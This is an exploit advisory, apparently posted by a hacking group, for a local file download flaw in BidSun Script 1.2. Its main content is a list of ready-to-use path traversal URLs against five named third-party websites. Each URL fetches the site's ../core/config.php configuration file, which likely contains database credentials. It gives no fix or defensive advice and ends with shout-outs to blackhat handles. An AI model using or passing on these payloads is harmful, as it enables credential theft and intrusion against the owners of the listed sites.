/*********************************************************************************** ** Exploit Title: BidSun Script Local File Download Vulnerability ** ** Exploit Author: FullSecurity.org ** ** Discovered By: Milad Hacking ** ** Vendor Homepage : http://bidsun.ir/ ** ** Demo Script Link: http://bidsun.ir/demo/ ** ** Version : 1.2 ** ** Date: 2016-01-13 ** ** Tested on: Kali Linux / lceweasel ** *********************************************************************************** ** Demo : http://knownsunknowns.com/index.php?mod=download&met=downFile&fileName=../core/config.php http://boloorbook.com/index.php?mod=download&met=downFile&fileName=../core/config.php http://arman.rahimzadeh.ir/index.php?mod=download&met=downFile&fileName=../core/config.php http://www.waresin.ir/index.php?mod=download&met=downFile&fileName=../core/config.php http://www.touristban.com/index.php?mod=download&met=downFile&fileName=../core/config.php *********************************************************************************** ** Special thanks to: iliya Norton - Milad Hacking - Mohamad Ghasemi - irhblackhat - distr0watch - N3TC4T - Mohamad Nofozi - Mr.G}{o$t - s4livan - MRS4JJ4D - SeCrEt_HaCkEr - Xodiak Blackhat - Shadow_Walker <3 *********************************************************************************** https://telegram.me/thehacking http://FullSecurity.org milad.hacking.blackhat@Gmail.com ***********************************************************************************